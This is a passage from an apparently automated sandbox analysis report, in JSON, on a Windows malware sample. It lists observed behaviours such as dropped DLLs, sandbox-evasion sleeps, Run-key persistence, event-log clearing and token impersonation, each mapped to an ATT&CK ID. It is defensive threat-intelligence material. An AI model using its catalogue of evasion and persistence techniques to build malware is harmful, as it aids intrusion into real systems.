"\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70fc0000\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" loaded module \"KERNEL32\" at base 76600000\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c720000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005224)\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005224)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76830000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-79", "relevance": 1, "name": "Contains ability to dynamically determine API calls", "description": "Found GetProcAddress() and LoadLibraryA() in an import section (Source: 8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d)", "origin": "Static Parser", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007"}, {"threat_level_human": "informative", "category": "General", "identifier": "stream-103", "type": 1, "relevance": 3, "name": "Contains ability to delay the execution of current thread", "description": "Sleep@KERNEL32.DLL at 00000000-00005224-52447-531-00408EDC\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-490-004051C1\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-526-004088D8\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-652-00406E2B\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-367-0040F206\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-321-00410895\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-534-004091F4\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-345-0040CDD9\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-532-00408F95\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-331-0040B4AF\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-304-004108F5\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-362-0040E9D7\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-292-0040B310\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-250-0040DD5A\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-245-00402059\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-633-0040DF20\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-537-004094D0\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-366-0040EF9B\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-649-00405B0C\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-371-0040F72C\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-525-004087AD\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-536-00409360\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-565-0040CD42\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-332-0040B589\n Sleep@KERNEL32.DLL at 00000000-00005224-52447-502-00405EEB", "origin": "Hybrid Analysis Technology", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-354", "type": 2, "relevance": 1, "name": "Contains reference to mutex-related activity (API string)", "description": "Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenMutexA\" (Indicator: \"OpenMutex\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")\n Found reference to API \"CreateMutexA\" (Indicator: \"CreateMutex\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-189", "type": 2, "relevance": 3, "name": "Contains ability to reboot/shutdown the operating system (API string)", "description": "Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"ExitWindowsEx\" (Indicator: \"ExitWindows\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\" was detected as \"Microsoft visual C++ 5.0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"update.exe,svchost.exe,services.exe,csrss.exe,winlogon.exe\" (File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-481", "type": 2, "relevance": 1, "name": "Reference explorer.exe process", "description": "Found string \"fonts\\explorer.exe\" (Indicator: \"explorer.exe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"\\explorer.exe\" (Indicator: \"explorer.exe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found string \"Explorer.exe,%s -shell\" (Indicator: \"explorer.exe\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")", "origin": "File/Memory", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\VERSION.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-LOCALIZATION-L1-2-1.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to access non-existent file \"C:\\Windows\\System32\\DLLLOAD.EXE\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\\TRACING\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLEAUT\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SAFEBOOT\\OPTION\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SRP\\GP\\DLL\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "string-310", "type": 2, "relevance": 1, "name": "Contains ability to load modules (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\version.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\system32\\version.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\System32\\sechost.dll\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\VERSION.DLL\"\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" trying to touch file \"C:\\Windows\\System32\\version.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORUSESYSTEMHEAP\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\OLE\"; Key: \"PAGEALLOCATORSYSTEMHEAPISPRIVATE\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"8A0DB8D6A2A702B17DB8B60AFC8F2D4FC00D8908506E0BA4ED35293D7D53010D\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CONNECT\"; Key: \"VALUENAME\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"CHECKDISK16\"; Value: \"\")\n \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN\"; Key: \"CHECKDISK16\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "stream-28", "type": 1, "relevance": 5, "name": "Contains ability to lookup the windows account name", "description": "GetUserNameA@ADVAPI32.DLL at 00000000-00005224-52447-345-0040CDD9\n GetUserNameA@ADVAPI32.DLL at 00000000-00005224-52447-213-004102BD", "origin": "Hybrid Analysis Technology", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "summary-29", "type": 15, "relevance": 1, "name": "Shows ability to use execution guardrails", "description": "The analysis shows indicators which can be used as execution guardrails to ensure that payload only executes against intended targets/system. Matched sigs: Makes a code branch decision directly after an API that is environment aware\n Matched sigs: Contains ability to detect virtual environment (API)\n Matched sigs: Able to identify virtual environment by using user activity (API string)\n Matched sigs: Contains ability to retrieve the time elapsed since the system was started (API string)\n Matched sigs: Able to identify virtual environment using sandbox registry\n Matched sigs: Contains ability to delay the execution of current thread", "origin": "Indicator Combinations", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-306", "type": 2, "relevance": 1, "name": "Contains ability to impersonate access tokens (API string)", "description": "Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenProcessToken\" (Indicator: \"OpenProcessToken\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-192", "type": 2, "relevance": 1, "name": "Contains ability to modify system service (API string)", "description": "Found reference to API \"ControlService\" (Indicator: \"ControlService\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"ControlService\" (Indicator: \"ControlService\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-318", "type": 2, "relevance": 1, "name": "Contains ability to load/free library (API string)", "description": "Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"LoadLibraryA\" (Indicator: \"LoadLibrary\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-304", "type": 2, "relevance": 1, "name": "Contains ability to modify registry key/value (API string)", "description": "Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"RegSetValueExA\" (Indicator: \"RegSetValue\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-211", "type": 2, "relevance": 1, "name": "Contains ability to delete all entries from an event log (API string)", "description": "Found reference to API \"ClearEventLogA\" (Indicator: \"ClearEventLog\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"ClearEventLogA\" (Indicator: \"ClearEventLog\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1070.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-544", "type": 2, "relevance": 1, "name": "Contains ability to open a service (API string)", "description": "Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; File: \"8a0db8d6a2a702b17db8b60afc8f2d4fc00d8908506e0ba4ed35293d7d53010d\")\n Found reference to API \"OpenServiceA\" (Indicator: \"OpenService\"; Source: \"00000000-00005224.00000000.139255.00431000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "string-92", "type": 2, "relevance": 1, "name": "Contains ability to inject code into another process (API string)", "description": "Found reference to API \"CreateThread\" (Indicator: \"CreateThread\"; File: 